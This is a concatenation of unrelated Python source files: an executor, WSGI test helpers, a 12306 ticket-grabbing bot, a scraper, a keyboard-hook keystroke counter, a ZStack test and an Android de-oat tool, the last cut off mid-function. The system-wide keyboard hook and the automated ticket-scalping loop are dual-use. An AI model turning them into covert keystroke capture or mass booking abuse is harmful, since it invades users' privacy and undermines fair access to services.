def __init__(self, process, queue):
self._done = False
self._process = process
self._queue = queue
def done(self):
self._done = self._done or not self._queue.empty()
return self._done
def get(self, timeout=None):
try:
res = self._queue.get(block=True, timeout=timeout)
except Empty:
raise executor.TimeoutError()
if self._process.is_alive():
kill_child_processes(self._process.pid)
self._process.terminate()
self._process.join()
self._queue.close()
self._queue.join_thread()
self._done = True
del self._queue
del self._process
return res
class LocalFutureNoFork(executor.Future):
"""Local wrapper for the future.
This is a none-fork version of LocalFuture.
Use this for the runtime that does not support fork (like cudnn)
"""
def __init__(self, result):
self._result = result
def done(self):
return True
def get(self, timeout=None):
return self._result
class LocalExecutor(executor.Executor):
"""Local executor that runs workers on the same machine with multiprocessing.
Parameters
----------
timeout: float, optional
timeout of a job. If time is out. A TimeoutError will be returned (not raised)
do_fork: bool, optional
For some runtime systems that do not support fork after initialization
(e.g. cuda runtime, cudnn). Set this to False if you have used these runtime
before submitting jobs.
"""
def __init__(self, timeout=None, do_fork=True):
self.timeout = timeout or executor.Executor.DEFAULT_TIMEOUT
self.do_fork = do_fork
if self.do_fork:
if not psutil:
raise RuntimeError("Python package psutil is missing. "
"please try `pip install psutil`")
def submit(self, func, *args, **kwargs):
if not self.do_fork:
return LocalFutureNoFork(func(*args, **kwargs))
queue = Queue(2) # Size of 2 to avoid a race condition with size 1.
process = Process(target=call_with_timeout,
args=(queue, self.timeout, func, args, kwargs))
process.start()
return LocalFuture(process, queue)
|
utils.py
|
import os
import threading
import warnings
from wsgiref.simple_server import make_server, WSGIRequestHandler
from wsgiref.util import shift_path_info
import requests
warnings.filterwarnings(action='ignore', category=DeprecationWarning,
module='requests')
TEST_FILE_PATH = os.path.join(os.path.dirname(__file__), 'test_files')
class SilentWSGIHandler(WSGIRequestHandler):
def log_message(*args):
pass
class TestServer(object):
"""
Wraps a WSGI application and allows you to make real HTTP
requests against it
"""
PREFIX = 'subdir'
def __init__(self, application):
self.application = application
self.server = make_server('127.0.0.1', 0, self.serve_under_prefix,
handler_class=SilentWSGIHandler)
def serve_under_prefix(self, environ, start_response):
prefix = shift_path_info(environ)
if prefix != self.PREFIX:
start_response('404 Not Found', [])
return []
else:
return self.application(environ, start_response)
def get(self, *args, **kwargs):
return self.request('get', *args, **kwargs)
def request(self, method, path, *args, **kwargs):
url = u'http://{0[0]}:{0[1]}{1}'.format(self.server.server_address, path)
thread = threading.Thread(target=self.server.handle_request)
thread.start()
response = requests.request(method, url, *args, **kwargs)
thread.join()
return response
class Files(object):
def __init__(self, directory, **files):
self.directory = os.path.join(TEST_FILE_PATH, directory)
for name, path in files.items():
url = u'/{}/{}' .format(TestServer.PREFIX, path)
with open(os.path.join(self.directory, path), 'rb') as f:
content = f.read()
setattr(self, name + '_path', path)
setattr(self, name + '_url', url)
setattr(self, name + '_content', content)
|
select_ticket_info.py
|
# -*- coding=utf-8 -*-
import datetime
import random
import os
import socket
import sys
import threading
import time
import TickerConfig
import wrapcache
from agency.cdn_utils import CDNProxy
from config import urlConf, configCommon
from config.TicketEnmu import ticket
from config.configCommon import seat_conf_2, seat_conf
from config.getCookie import getDrvicesID
from init.login import GoLogin
from inter.AutoSubmitOrderRequest import autoSubmitOrderRequest
from inter.ChechFace import chechFace
from inter.CheckUser import checkUser
from inter.GetPassengerDTOs import getPassengerDTOs
from inter.LiftTicketInit import liftTicketInit
from inter.Query import query
from inter.SubmitOrderRequest import submitOrderRequest
from myException.PassengerUserException import PassengerUserException
from myException.UserPasswordException import UserPasswordException
from myException.ticketConfigException import ticketConfigException
from myException.ticketIsExitsException import ticketIsExitsException
from myException.ticketNumOutException import ticketNumOutException
from myUrllib.httpUtils import HTTPClient
class select:
"""
快速提交车票通道
"""
def __init__(self):
self.get_ticket_info()
self._station_seat = [seat_conf[x] for x in TickerConfig.SET_TYPE]
self.auto_code_type = 2
self.httpClint = HTTPClient(TickerConfig.IS_PROXY)
self.urls = urlConf.urls
self.login = GoLogin(self, TickerConfig.IS_AUTO_CODE, self.auto_code_type)
self.cdn_list = []
self.queryUrl = "leftTicket/queryT"
self.passengerTicketStrList = ""
self.passengerTicketStrByAfterLate = ""
self.oldPassengerStr = ""
self.set_type = ""
@staticmethod
def get_ticket_info():
"""
获取配置信息
:return:
"""
print(u"*" * 50)
print(u"检查当前python版本为:{},目前版本只支持3.6以上".format(sys.version.split(" ")[0]))
print(u"12306刷票小助手,最后更新于2019.01.08,请勿作为商业用途,交流群号:286271084(已满),"
u" 2群:649992274(已满)\n"
u" 3群:632501142(已满)\n"
u" 4群: 606340519(已满)\n"
u" 5群: 948526733(已满)\n"
u" 6群: 444101020(未满)\n"
u" 7群: 660689659(未满)\n"
)
print(
f"当前配置:\n出发站:{TickerConfig.FROM_STATION}\n到达站:{TickerConfig.TO_STATION}\n乘车日期:{','.join(TickerConfig.STATION_DATES)}\n坐席:{','.join(TickerConfig.SET_TYPE)}\n是否有票优先提交:{TickerConfig.IS_MORE_TICKET}\n乘车人:{TickerConfig.TICKET_PEOPLES}\n" \
f"刷新间隔: 随机(1-3S)\n僵尸票关小黑屋时长: {TickerConfig.TICKET_BLACK_LIST_TIME}\n下单接口: {TickerConfig.ORDER_TYPE}\n下单模式: {TickerConfig.ORDER_MODEL}\n预售踩点时间:{TickerConfig.OPEN_TIME}")
print(u"*" * 50)
def station_table(self, from_station, to_station):
"""
读取车站信息
:param station:
:return:
"""
path = os.path.join(os.path.dirname(__file__), '../station_name.txt')
try:
with open(path, encoding="utf-8") as result:
info = result.read().split('=')[1].strip("'").split('@')
except Exception:
with open(path) as result:
info = result.read().split('=')[1].strip("'").split('@')
del info[0]
station_name = {}
for i in range(0, len(info)):
n_info = info[i].split('|')
station_name[n_info[1]] = n_info[2]
try:
from_station = station_name[from_station.encode("utf8")]
to_station = station_name[to_station.encode("utf8")]
except KeyError:
from_station = station_name[from_station]
to_station = station_name[to_station]
return from_station, to_station
def call_login(self, auth=False):
"""
登录回调方法
:return:
"""
if auth:
return self.login.auth()
else:
configCommon.checkSleepTime(self) # 防止网上启动晚上到点休眠
self.login.go_login()
def cdn_req(self, cdn):
for i in range(len(cdn) - 1):
http = HTTPClient(0)
urls = self.urls["loginInitCdn"]
http._cdn = cdn[i].replace("\n", "")
start_time = datetime.datetime.now()
rep = http.send(urls)
if rep and "message" not in rep and (datetime.datetime.now() - start_time).microseconds / 1000 < 500:
if cdn[i].replace("\n", "") not in self.cdn_list: # 如果有重复的cdn,则放弃加入
# print(u"加入cdn {0}".format(cdn[i].replace("\n", "")))
self.cdn_list.append(cdn[i].replace("\n", ""))
print(u"所有cdn解析完成...")
def cdn_certification(self):
"""
cdn 认证
:return:
"""
if TickerConfig.IS_CDN == 1:
CDN = CDNProxy()
all_cdn = CDN.open_cdn_file()
if all_cdn:
# print(u"由于12306网站策略调整,cdn功能暂时关闭。")
print(u"开启cdn查询")
print(u"本次待筛选cdn总数为{}, 筛选时间大约为5-10min".format(len(all_cdn)))
t = threading.Thread(target=self.cdn_req, args=(all_cdn,))
t.setDaemon(True)
# t2 = threading.Thread(target=self.set_cdn, args=())
t.start()
# t2.start()
else:
raise ticketConfigException(u"cdn列表为空,请先加载cdn")
def main(self):
self.cdn_certification()
l = liftTicketInit(self)
l.reqLiftTicketInit()
getDrvicesID(self)
self.call_login()
check_user = checkUser(self)
t = threading.Thread(target=check_user.sendCheckUser)
t.setDaemon(True)
t.start()
from_station, to_station = self.station_table(TickerConfig.FROM_STATION, TickerConfig.TO_STATION)
num = 0
s = getPassengerDTOs(session=self, ticket_peoples=TickerConfig.TICKET_PEOPLES)
passenger = s.sendGetPassengerDTOs()
wrapcache.set("user_info", passenger, timeout=9999999)
while 1:
try:
num += 1
now = datetime.datetime.now() # 感谢群里大佬提供整点代码
configCommon.checkSleepTime(self) # 晚上到点休眠
if TickerConfig.ORDER_MODEL is 1:
sleep_time_s = 0.5
sleep_time_t = 0.6
# 测试了一下有微妙级的误差,应该不影响,测试结果:2019-01-02 22:30:00.004555,预售还是会受到前一次刷新的时间影响,暂时没想到好的解决方案
while not now.strftime("%H:%M:%S") == TickerConfig.OPEN_TIME:
now = datetime.datetime.now()
if now.strftime("%H:%M:%S") > TickerConfig.OPEN_TIME:
break
time.sleep(0.0001)
else:
sleep_time_s = 0.5
sleep_time_t = 3
q = query(session=self,
from_station=from_station,
to_station=to_station,
from_station_h=TickerConfig.FROM_STATION,
to_station_h=TickerConfig.TO_STATION,
_station_seat=self._station_seat,
station_trains=TickerConfig.STATION_TRAINS,
station_dates=TickerConfig.STATION_DATES,
ticke_peoples_num=len(TickerConfig.TICKET_PEOPLES),
)
queryResult = q.sendQuery()
# 查询接口
if queryResult.get("status", False):
train_no = queryResult.get("train_no", "")
train_date = queryResult.get("train_date", "")
stationTrainCode = queryResult.get("stationTrainCode", "")
secretStr = queryResult.get("secretStr", "")
seat = queryResult.get("seat", "")
leftTicket = queryResult.get("leftTicket", "")
query_from_station_name = queryResult.get("query_from_station_name", "")
query_to_station_name = queryResult.get("query_to_station_name", "")
is_more_ticket_num = queryResult.get("is_more_ticket_num", len(TickerConfig.TICKET_PEOPLES))
if wrapcache.get(train_no):
print(ticket.QUEUE_WARNING_MSG.format(train_no))
else:
# 获取联系人
s = getPassengerDTOs(session=self, ticket_peoples=TickerConfig.TICKET_PEOPLES,
set_type="" if isinstance(seat, list) else seat_conf_2[seat],
# 候补订单需要设置多个坐席
is_more_ticket_num=is_more_ticket_num)
getPassengerDTOsResult = s.getPassengerTicketStrListAndOldPassengerStr()
if getPassengerDTOsResult.get("status", False):
self.passengerTicketStrList = getPassengerDTOsResult.get("passengerTicketStrList", "")
self.passengerTicketStrByAfterLate = getPassengerDTOsResult.get(
"passengerTicketStrByAfterLate", "")
self.oldPassengerStr = getPassengerDTOsResult.get("oldPassengerStr", "")
self.set_type = getPassengerDTOsResult.get("set_type", "")
# 提交订单
# 订单分为两种,一种为抢单,一种为候补订单
if TickerConfig.TICKET_TYPE == 1:
if TickerConfig.ORDER_TYPE == 1: # 快速下单
a = autoSubmitOrderRequest(session=self,
secretStr=secretStr,
train_date=train_date,
passengerTicketStr=self.passengerTicketStrList,
oldPassengerStr=self.oldPassengerStr,
train_no=train_no,
stationTrainCode=stationTrainCode,
leftTicket=leftTicket,
set_type=self.set_type,
query_from_station_name=query_from_station_name,
query_to_station_name=query_to_station_name,
)
a.sendAutoSubmitOrderRequest()
elif TickerConfig.ORDER_TYPE == 2: # 普通下单
sor = submitOrderRequest(self, secretStr, from_station, to_station, train_no,
self.set_type,
self.passengerTicketStrList, self.oldPassengerStr, train_date,
TickerConfig.TICKET_PEOPLES)
sor.sendSubmitOrderRequest()
elif TickerConfig.TICKET_TYPE == 2:
c = chechFace(self, secretStr)
c.sendChechFace()
else:
random_time = round(random.uniform(sleep_time_s, sleep_time_t), 2)
print(u"正在第{0}次查询 随机停留时长:{6} 乘车日期: {1} 车次:{2} 查询无票 cdn轮询IP:{4}当前cdn总数:{5} 总耗时:{3}ms".format(num,
",".join(
TickerConfig.STATION_DATES),
",".join(
TickerConfig.STATION_TRAINS),
(
datetime.datetime.now() - now).microseconds / 1000,
queryResult.get(
"cdn",
None),
len(
self.cdn_list),
random_time))
time.sleep(random_time)
except PassengerUserException as e:
print(e)
break
except ticketConfigException as e:
print(e)
break
except ticketIsExitsException as e:
print(e)
break
except ticketNumOutException as e:
print(e)
break
except UserPasswordException as e:
print(e)
break
except ValueError as e:
if e == "No JSON object could be decoded":
print(u"12306接口无响应,正在重试")
else:
print(e)
except KeyError as e:
print(e)
except TypeError as e:
print(u"12306接口无响应,正在重试 {0}".format(e))
except socket.error as e:
print(e)
if __name__ == '__main__':
s = select()
cdn = s.station_table("长沙", "深圳")
|
getSearchResult.py
|
# -*- coding: UTF-8 -*-
from HTMLParser import HTMLParser
import re
import urllib,urllib2,cookielib
import threading,time
import publicParams as P
import reHTMLTags as rH
class getSearchResult(HTMLParser):
def __init__(self,addr):
HTMLParser.__init__(self)
self.data={}
self.lstr=None
self.a_text = None
self.addr=addr
def handle_starttag(self, tag, attr):
if tag == "a":
if len(attr) == 0:
pass
else:
for (variable, value) in attr:
self.a_text = True
if variable == "href":
self.lstr=value
def handle_endtag(self, tag):
if tag == 'a':
self.a_text = None
def handle_data(self, data):
#P.list_time.append("1.1"+str(time.ctime()))
if self.a_text:
re_s =re.search( P.key, data, re.M|re.I|re.U)
if re_s:
ts=self.lstr.split('/')[0]
if len(ts) > 0 :
self.lstr=self.lstr
else :
self.lstr=self.addr+self.lstr
#P.list_time.append("1.2"+str(time.ctime()))
if P.list_links.count(self.lstr)==0:
P.list_links.append(self.lstr)
P.list_titles.append(data)
#P.list_time.append("1.3"+str(time.ctime()))
h=getChtml(self.lstr)
#P.list_time.append("1.4"+str(time.ctime()))
if h:
h=rH.getString(h)
sc=rH.getCount(h,P.key)
if sc == 0:
pass
else:
self.data['weight']=sc
self.data['title']=data.encode('utf-8')
self.data['link']=self.lstr.encode('utf-8')
P.list_data.append(self.data)
else:
pass
#t = threading.Thread(target=self.thr)
#t.start()
#P.list_time.append("1.5"+str(time.ctime()))
self.data={}
def getChtml(url):
content=None
req=urllib2.Request(url)
if req:
res=urllib2.urlopen(req)
content=res.read()
else:
pass
return content
|
keyboard.py
|
import pyHook
import pythoncom
from multiprocessing import Process, Value
# This function is run in its own process to allow it to gather keypresses
def log_key_count(val):
def OnKeyboardEvent(event):
val.value += 1
return True
hm = pyHook.HookManager()
hm.KeyDown = OnKeyboardEvent
hm.HookKeyboard()
pythoncom.PumpMessages()
class StreamGatherer():
streamname = "keypresses"
streamschema = {"type": "integer"}
description = "Gathers the number of keystrokes made on the keyboard"
datatype = "action.count"
icon = "material:keyboard"
def __init__(self):
self.keypress_number = Value('i', 0)
self.keylogger_process = None
def start(self, cache):
# Starts the background processes and stuff. The cache is passed, so that
# if the gatherer catches events, they can be logged as they come in
if self.keylogger_process is None:
self.keylogger_process = Process(
target=log_key_count, args=(self.keypress_number,))
self.keylogger_process.daemon = True
self.keylogger_process.start()
def stop(self):
if self.keylogger_process is not None:
self.keylogger_process.terminate()
self.keylogger_process = None
self.keypress_number.value = 0
def run(self, cache):
kp = self.keypresses()
if kp > 0:
cache.insert(self.streamname, kp)
# Gets the number of keypresses that are logged, and reset the counter
def keypresses(self):
v = self.keypress_number.value
self.keypress_number.value = 0
return v
|
test_crt_temp_image_progress2.py
|
'''
Test Progress of Create Image Template from Root Volume
@author: quarkonics
'''
import zstackwoodpecker.test_util as test_util
import zstackwoodpecker.test_lib as test_lib
import zstackwoodpecker.test_state as test_state
import zstackwoodpecker.zstack_test.zstack_test_image as test_image
import zstackwoodpecker.zstack_test.zstack_test_vm as test_vm
import zstackwoodpecker.operations.config_operations as conf_ops
import zstackwoodpecker.operations.resource_operations as res_ops
import os
import time
import threading
import tempfile
import uuid
_config_ = {
'timeout' : 1800,
'noparallel' : False
}
test_stub = test_lib.lib_get_test_stub()
#test_obj_dict is to track test resource. They will be cleanup if there will be any exception in testing.
test_obj_dict = test_state.TestStateDict()
origin_interval = None
bs_type = None
threads_num = 1
vms = [None] * threads_num
images = [None] * threads_num
image_jobs = [None] * threads_num
threads = [None] * threads_num
checker_threads = [None] * threads_num
checker_results = [None] * threads_num
def create_temp_image(index):
global vms
global images
image_creation_option = test_util.ImageOption()
backup_storage_list = test_lib.lib_get_backup_storage_list_by_vm(vms[index].vm)
image_creation_option.set_backup_storage_uuid_list([backup_storage_list[0].uuid])
image_creation_option.set_root_volume_uuid(vms[index].vm.rootVolumeUuid)
image_creation_option.set_name('test_create_image_template_progress%s' % (index))
bs_type = backup_storage_list[0].type
if bs_type == 'Ceph':
origin_interval = conf_ops.change_global_config('ceph', 'imageCache.cleanup.interval', '1')
images[index] = test_image.ZstackTestImage()
images[index].set_creation_option(image_creation_option)
image_jobs[index] = str(uuid.uuid4()).replace('-', '')
images[index].create(image_jobs[index])
test_obj_dict.add_image(images[index])
def check_create_temp_image_progress(index):
global images
for i in range(0, 100):
time.sleep(0.1)
image_cond = res_ops.gen_query_conditions("status", '=', "Creating")
image_cond = res_ops.gen_query_conditions("name", '=', "test_create_image_template_progress%s" % (index), image_cond)
image_query = res_ops.query_resource_fields(res_ops.IMAGE, image_cond, \
None, fields=['uuid'])
if len(image_query) > 0:
break
if len(image_query) <= 0:
test_util.test_fail("image is not in creating after 10 seconds")
for i in range(0, 100):
progress = res_ops.get_task_progress(image_jobs[index]).inventories[0]
if progress.content != None:
break
else:
test_util.test_logger('task progress still not ready')
time.sleep(0.1)
if int(progress.content) < 0 or int(progress.content) > 100:
test_util.test_fail("Progress of task should be between 0 and 100, while it actually is %s" % (progress.content))
for i in range(0, 3600):
last_progress = progress
progress = res_ops.get_task_progress(image_jobs[index]).inventories[0]
if progress.content == None:
break
if int(progress.content) < int(last_progress.content):
test_util.test_fail("Progress (%s) of task is smaller than last time (%s)" % (progress.content, last_progress.content))
image_cond = res_ops.gen_query_conditions("uuid", '=', image_query[0].uuid)
image_query2 = res_ops.query_resource_fields(res_ops.IMAGE, image_cond, \
None, fields=['status'])
if image_query2[0].status != "Ready":
test_util.test_fail("Image should be ready when no progress anymore")
checker_results[index] = 'pass'
def test():
global vms
global images
global threads
global checker_threads
global origin_interval
global bs_type
test_util.test_dsc('Create test vm and check')
script_file = tempfile.NamedTemporaryFile(delete=False)
script_file.write('dd if=/dev/zero of=/home/dd bs=1M count=100')
script_file.close()
for i in range(0, threads_num):
vms[i] = test_stub.create_vlan_vm()
vms[i].check()
backup_storage_list = test_lib.lib_get_backup_storage_list_by_vm(vms[i].vm)
if backup_storage_list[0].type != 'ImageStoreBackupStorage':
test_util.test_skip("Requires imagestore BS to test, skip testing")
if not test_lib.lib_execute_shell_script_in_vm(vms[i].get_vm(), script_file.name):
test_util.test_fail("fail to create data in [vm:] %s" % (vms[i].get_vm().uuid))
test_obj_dict.add_vm(vms[i])
vms[i].stop()
os.unlink(script_file.name)
for i in range(0, threads_num):
threads[i] = threading.Thread(target=create_temp_image, args=(i, ))
threads[i].start()
for i in range(0, threads_num):
checker_threads[i] = threading.Thread(target=check_create_temp_image_progress, args=(i, ))
checker_threads[i].start()
for i in range(0, threads_num):
checker_threads[i].join()
threads[i].join()
images[i].check()
vms[i].destroy()
images[i].delete()
for i in range(0, threads_num):
if checker_results[i] == None:
test_util.test_fail("Image checker thread %s fail" % (i))
if bs_type == 'Ceph':
time.sleep(60)
if bs_type == 'Ceph':
conf_ops.change_global_config('ceph', 'imageCache.cleanup.interval', origin_interval)
test_util.test_pass('Create Image Template Test Success')
#Will be called only if exception happens in test().
def error_cleanup():
global test_obj_dict
global origin_interval
global bs_type
if bs_type == 'Ceph':
conf_ops.change_global_config('ceph', 'imageCache.cleanup.interval', origin_interval)
test_lib.lib_error_cleanup(test_obj_dict)
|
deoat.py
|
#!/usr/bin/python
# Copyright 2015 Coron
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
"""
Convert the OAT format on ART to DEX format on DALVIKVM.
Usage: deoat.py [OPTIONS] <otapackage.zip> [<otapackage.deoat.zip>]
OPTIONS:
--app, -a: only de-oat the apk in system.
--framework, -f: only de-oat the jar in system.
"""
# Refer to the SuperR's Kitchen for the deodex Lollipop ROMs
__author__ = 'duanqz@gmail.com'
import os
import commands
import re
import shutil
import threading
from common import Utils, Log
# Global
TAG="reverse-deoat"
OPTIONS = None
class OatZip:
""" Model of OAT ZIP file
"""
OAT2DEX = os.path.join(os.path.dirname(__file__), "de-oat", "oat2dex.sh")
def __init__(self, unzipRoot):
self.mRoot = unzipRoot
self.mFrwDir = os.path.join(self.mRoot, "system/framework")
self.mAppDir = os.path.join(self.mRoot, "system/app")
self.mPrivAppDir = os.path.join(self.mRoot, "system/priv-app")
self.mAllAppDirList = [self.mFrwDir, self.mAppDir, self.mPrivAppDir]
self.mSystemDir = os.path.join(self.mRoot, "system")
self.findArch()
self.mBootOAT = os.path.join(self.mFrwDir, self.arch, "boot.oat")
if os.path.exists(self.mBootOAT):
Log.i(TAG, "mBootOAT : " + self.mBootOAT)
else:
self.mBootOAT = None
Log.i(TAG, "boot.oat not found!")
@staticmethod
def testArch(frwDir, arch):
""" Test whether arch exists
"""
bootOATPath = os.path.join(frwDir, arch, "boot.oat")
Log.i(TAG, "testArch : " + bootOATPath)
if os.path.exists(bootOATPath):
return True
return False
def findArch(self):
""" Find arch and arch2
"""
self.arch = ""
self.arch2 = ""
if OatZip.testArch(self.mFrwDir, "arm64"):
self.arch = "arm64"
if OatZip.testArch(self.mFrwDir, "arm"):
self.arch2 = "arm"
elif OatZip.testArch(self.mFrwDir, "x86_64"):
self.arch = "x86_64"
if OatZip.testArch(self.mFrwDir, "x86"):
self.arch2="x86"
elif OatZip.testArch(self.mFrwDir, "arm"):
self.arch = "arm"
elif OatZip.testArch(self.mFrwDir, "x86"):
self.arch = "x86"
else:
Log.d(TAG, "unknow arch")
def findBootOAT(self):
""" Find the absolute path of boot.oat
In Android 5.0+, all the jars of BOOTCLASSPATH are packaged into boot.oat
"""
bootOATPath = os.path.join(self.mFrwDir, "arm64/boot.oat")
if os.path.exists(bootOATPath):
return bootOATPath
bootOATPath = os.path.join(self.mFrwDir, "arm/boot.oat")
if os.path.exists(bootOATPath):
return bootOATPath
bootOATPath = os.path.join(self.mFrwDir, "x86_64/boot.oat")
if os.path.exists(bootOATPath):
return bootOATPath
bootOATPath = os.path.join(self.mFrwDir, "x86/boot.oat")
if os.path.exists(bootOATPath):
return bootOATPath
bootOATPath = None
cmd = "find %s -name boot.oat" % (commands.mkarg(self.mFrwDir))
(sts, text) = commands.getstatusoutput(cmd)
try:
if sts == 0:
text = text.split("\n")[0]
if len(text) > 0:
return text
except:
bootOATPath = None
return bootOATPath
def deoat(self):
""" De-oat the OTA package.
"""
if self.mBootOAT == None:
Log.i(TAG, "deoat(): boot.oat not found in %s, nothing need deoat" % self.mRoot)
return self
# Phase 1: de-oat boot.oat
OatZip.deoatBootOAT(os.path.join(self.mFrwDir, self.arch, "boot.oat"))
if self.arch2.strip():
OatZip.deoatBootOAT(os.path.join(self.mFrwDir, self.arch2, "boot.oat"))
# Phase 2: de-oat all the other oat files, of which suffix is odex.
# [Android 5.0]: All the oat jars are located in the same folder with boot.oat
# Phase 3: de-oat app
# de-oat app
threadApp = threading.Thread(target = OatZip.deoatAppWithArch, args = (self.mAppDir, self.mFrwDir, self.arch, self.arch2))
threadApp.start()
threadPrivApp = threading.Thread(target = OatZip.deoatAppWithArch, args = (self.mPrivAppDir, self.mFrwDir, self.arch, self.arch2))
threadPrivApp.start()
threadApp.join()
threadPrivApp.join()
# Phase 4: de-oat framework
# de-oat framework
OatZip.deoatFrwWithArch(self.mFrwDir, self.arch)
# de-oat framework/oat/$arch
OatZip.deoatFrwOatWithArch(self.mFrwDir, self.arch)
return self
def rebuild(self):
""" Rebuild the deoated zip
"""
if self.mBootOAT == None:
Log.i(TAG, "rebuild(): boot.oat not found, nothing need rebuild")
return
# repackage app
OatZip.repackageAppWithArch(self.mAppDir, self.arch)
if self.arch2.strip():
OatZip.repackageAppWithArch(self.mAppDir, self.arch2)
OatZip.repackageAppWithArch(self.mPrivAppDir, self.arch)
if self.arch2.strip():
OatZip.repackageAppWithArch(self.mPrivAppDir, self.arch2)
# repackage framework
#$framedir/$arch
OatZip.repackageFrwWithArch(self.mFrwDir, os.path.join(self.mFrwDir, self.arch))
#$framedir/$arch/dex
if os.path.exists(os.path.join(self.mFrwDir, self.arch, "dex")):
OatZip.repackageFrwWithArch(self.mFrwDir, os.path.join(self.mFrwDir, self.arch, "dex"))
#$framedir/oat/$arch
if os.path.exists(os.path.join(self.mFrwDir, "oat", self.arch)):
OatZip.repackageFrwWithArch(self.mFrwDir, os.path.join(self.mFrwDir, "oat", self.arch))
# deal with additional apks not in system/framework system/app system/priv-app
OatZip.dealWithAdditionalApks(self.mSystemDir, self.mFrwDir, self.arch, self.arch2, self.mAllAppDirList)
# Remove arch and arch2 dir
os.chdir(self.mRoot)
shutil.rmtree(os.path.join(self.mFrwDir, self.arch))
if self.arch2.strip():
shutil.rmtree(os.path.join(self.mFrwDir, self.arch2))
if os.path.exists(os.path.join(self.mFrwDir, "oat")) :
shutil.rmtree(os.path.join(self.mFrwDir, "oat"))
@staticmethod
def deoatBootOAT(bootOAT):
""" De-oat boot.oat
"""
bootClassFolder = os.path.dirname(bootOAT)
bootClassFolderDex = os.path.join(bootClassFolder, "dex")
bootClassFolderOdex = os.path.join(bootClassFolder, "odex")
if os.path.exists(bootClassFolderDex):
Log.d(TAG, "Delete the already exists %s" %bootClassFolderDex)
shutil.rmtree(bootClassFolderDex)
if os.path.exists(bootClassFolderOdex):
Log.d(TAG, "Delete the already exists %s" %bootClassFolderOdex)
shutil.rmtree(bootClassFolderOdex)
Log.i(TAG, "De-oat %s" % bootOAT)
Utils.runWithOutput([OatZip.OAT2DEX, "boot", bootOAT])
@staticmethod
def packageDexToAppWithArch(apkFile, arch):
# Keep the old directory, we will change back after some operations.
oldDir = os.path.abspath(os.curdir)
apkPath = os.path.dirname(apkFile)
appName = os.path.basename(apkFile)
app = appName[0:-4]
archPath = os.path.join(apkPath, "oat", arch)
# chagnge to arch path
os.chdir(archPath)
Log.d(TAG, "Repackage %s" %(apkFile))
dexFile = os.path.join(archPath, app + ".dex")
# mv $appdir/$app/$arch/$app.dex $appdir/$app/$arch/classes.dex
if os.path.exists(dexFile):
shutil.move(dexFile, os.path.join(archPath, "classes.dex"))
Utils.runWithOutput(["jar", "uf", apkFile, "classes.dex"])
else:
Log.d(TAG, "Repackage ERROR %s" %(apkFile))
dexFile = os.path.join(archPath, app + "-classes2.dex")
# if [[ -f "$appdir/$app/$arch/$app-classes2.dex" ]]; then
# mv $appdir/$app/$arch/$app-classes2.dex $appdir/$app/$arch/classes2.dex
if os.path.exists(dexFile):
shutil.move(dexFile, os.path.join(archPath, "classes2.dex"))
Utils.runWithOutput(["jar", "uf", apkFile, "classes2.dex"])
dexFile = os.path.join(archPath, app + "-classes3.dex")
# if [[ -f "$appdir/$app/$arch/$app-classes3.dex" ]]; then
# mv $appdir/$app/$arch/$app-classes3.dex $appdir/$app/$arch/classes3.dex
if os.path.exists(dexFile):
shutil.move(dexFile, os.path.join(archPath, "classes3.dex"))
Utils.runWithOutput(["jar", "uf", apkFile, "classes3.dex"])
os.chdir(oldDir)
@staticmethod
def deoatFrwWithArch(frwDir, arch):
""" De-oat framework
"""
if not OPTIONS.formatFrw: return
Log.i(TAG, "De-oat files of oat-format in %s" % frwDir)
archDir = os.path.join(frwDir, arch)
odexDir = os.path.join(archDir, "odex")
for item in os.listdir(archDir):
if item.endswith(".odex"):
jarFile = os.path.join(frwDir, item[0:-5] + ".jar")
if not OatZip.isDeodexed(jarFile):
odexFile = os.path.join(archDir, item)
Utils.runWithOutput([OatZip.OAT2DEX, odexFile, odexDir])
@staticmethod
def deoatFrwOatWithArch(frwDir, arch):
""" De-oat framework oat
"""
if not OPTIONS.formatFrw: return
Log.i(TAG, "De-oat files of oat-format in %s/oat" % frwDir)
archDir = os.path.join(frwDir, arch)
odexDir = os.path.join(archDir, "odex")
oatDir = os.path.join(frwDir, "oat", arch)
if not os.path.exists(oatDir): return
for item in os.listdir(oatDir):
if item.endswith(".odex"):
jarFile = os.path.join(frwDir, item[0:-5] + ".jar")
if not OatZip.isDeodexed(jarFile):
odexFile = os.path.join(oatDir, item)
Utils.runWithOutput([OatZip.OAT2DEX, odexFile, odexDir])
@staticmethod
def isDeodexed(apkFile):
""" Wheather apk/jar is deodexed
"""
cmd = "jar tf " + apkFile + "| grep classes.dex"
(sts, text) = commands.getstatusoutput(cmd)
if sts == 0 and text.find('classes.dex') != -1:
return True
return False
@staticmethod
def deoatAppWithArch(appsDir, frwDir, arch, arch2):
""" De-oat app
"""
if OPTIONS.formatApp == False: return
Log.i(TAG, "De-oat files of oat-format in %s" %(appsDir))
bootClassFolderArch = os.path.join(frwDir, arch, "odex")
bootClassFolderArch2 = os.path.join(frwDir, arch2, "odex")
#for app in $( ls $appdir ); do
for app in os.listdir(appsDir):
appPath = os.path.join(appsDir, app)
apkFile = os.path.join(appPath, app + ".apk")
archPath = os.path.join(appPath, "oat", arch)
#if [[ -d "$appdir/$app/$arch" ]];
if os.path.exists(archPath):
odexFile = os.path.join(archPath, app + ".odex")
#java -Xmx512m -jar $oat2dex $appdir/$app/$arch/$app.odex $framedir/$arch/odex
Utils.runWithOutput([OatZip.OAT2DEX, odexFile, bootClassFolderArch])
else:
# if exists arch2
if arch2.strip():
arch2Path = os.path.join(appPath, "oat", arch2)
if os.path.exists(arch2Path):
odexFile2 = os.path.join(arch2Path, app + ".odex")
Utils.runWithOutput([OatZip.OAT2DEX, odexFile2, bootClassFolderArch2])
@staticmethod
def repackageFrwWithArch(frwDir, dexFolder):
""" Repackage the classes.dex into jar of frwDir.
"""
if OPTIONS.formatFrw == False : return
# Keep the old directory, we will change back after some operations.
oldDir = os.path.abspath(os.curdir)
Log.i(TAG, "Repackage JARs of %s - %s" %(frwDir,dexFolder))
os.chdir(dexFolder)
for dexFile in os.listdir(dexFolder):
if dexFile.endswith(".dex") and dexFile.find("classes") == -1:
appName = dexFile[0:-4]
jarFile = os.path.join(frwDir, appName + ".apk")
if not os.path.exists(jarFile):
jarFile = jarFile[0:-4] + ".jar"
if not os.path.exists(jarFile):
dexName = "classes.dex"
